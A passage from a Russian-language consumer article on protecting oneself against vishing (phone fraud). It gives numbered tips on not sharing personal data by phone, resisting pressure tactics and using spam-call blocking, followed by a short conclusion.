Ни при каких обстоятельствах вы не должны сообщать личную или финансовую информацию по телефону, особенно если звонок был инициирован не вами. Законные организации никогда не будут запрашивать по телефону конфиденциальные данные, такие как номера социального страхования, пароли учетных записей или данные кредитной карты.
3. Не идите на поводу у манипулятора
Вишинг-мошенники полагаются на тактику эмоционального давления, чтобы подтолкнуть вас к принятию импульсивных решений. Всегда оставайтесь при совсем мнении. Прервите разговор, дайте себе время на обдумывание услышанного.
4. Используйте защиту от спам-звонков
Все современные мобильные телефоны оснащены функцией проверки вызовов, которая может помочь выявить и заблокировать все нежелательные звонки.
Заключение

Вишинг представляет собой серьезную угрозу в наш цифровой век. Однако, понимая механику телефонного мошенничества, и следуя подробным советам, представленным в этой статье, вы сможете значительно обезопасить себя. Помните, что ваша личная информация бесценна, и ее защита имеет первостепенное значение. Следите за нашими статьями, чтобы оставаться в курсе, так как осведомленность и осторожность помогут вам оставаться на шаг впереди мошенников и не стать их жертвой.